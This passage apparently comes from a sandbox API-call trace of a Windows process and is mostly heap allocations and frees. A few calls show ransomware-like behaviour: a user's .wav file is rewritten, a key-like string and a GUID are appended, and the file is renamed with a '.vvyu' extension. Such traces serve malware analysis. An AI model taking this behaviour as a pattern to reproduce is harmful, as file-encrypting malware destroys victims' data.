hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0198.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0198.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0198.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0198.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0198.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0198.248] WriteFile (in: hFile=0x52c, lpBuffer=0x2d51778*, nNumberOfBytesToWrite=0x12b83, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d51778*, lpNumberOfBytesWritten=0x30ffb14*=0x12b83, lpOverlapped=0x0) returned 1 [0198.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d51778 | out: hHeap=0x6a0000) returned 1 [0198.250] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x12b88, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.250] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0198.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0198.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0198.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0198.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0198.251] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0198.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.252] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.252] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0198.252] CloseHandle (hObject=0x52c) returned 1 [0198.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd0) returned 0x2d4f790 [0198.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e0) returned 0x2d3a670 [0198.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4f790 | out: hHeap=0x6a0000) returned 1 [0198.254] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\ZcUZ5M4Jt.wav" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\zcuz5m4jt.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\ZcUZ5M4Jt.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\zcuz5m4jt.wav.vvyu")) returned 1 [0198.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0198.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.257] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0198.260] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cc54d0, ftCreationTime.dwHighDateTime=0x1d89cc6, ftLastAccessTime.dwLowDateTime=0x97e38980, ftLastAccessTime.dwHighDateTime=0x1d8a3b1, ftLastWriteTime.dwLowDateTime=0x97e38980, ftLastWriteTime.dwHighDateTime=0x1d8a3b1, nFileSizeHigh=0x0, nFileSizeLow=0x12b88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZcUZ5M4Jt.wav", cAlternateFileName="ZCUZ5M~1.WAV")) returned 0 [0198.260] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0198.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0198.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b578 | out: hHeap=0x6a0000) returned 1 [0198.261] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0198.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49848 [0198.261] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0198.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0198.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0198.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0198.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0198.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.267] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0198.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0198.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0198.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0198.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0198.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0198.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0198.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0198.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0198.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0198.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0198.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0198.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0198.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0198.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0198.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0198.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0198.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0198.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0198.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0198.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0198.294] HeapFree (in: hHeap=0x6a0000, 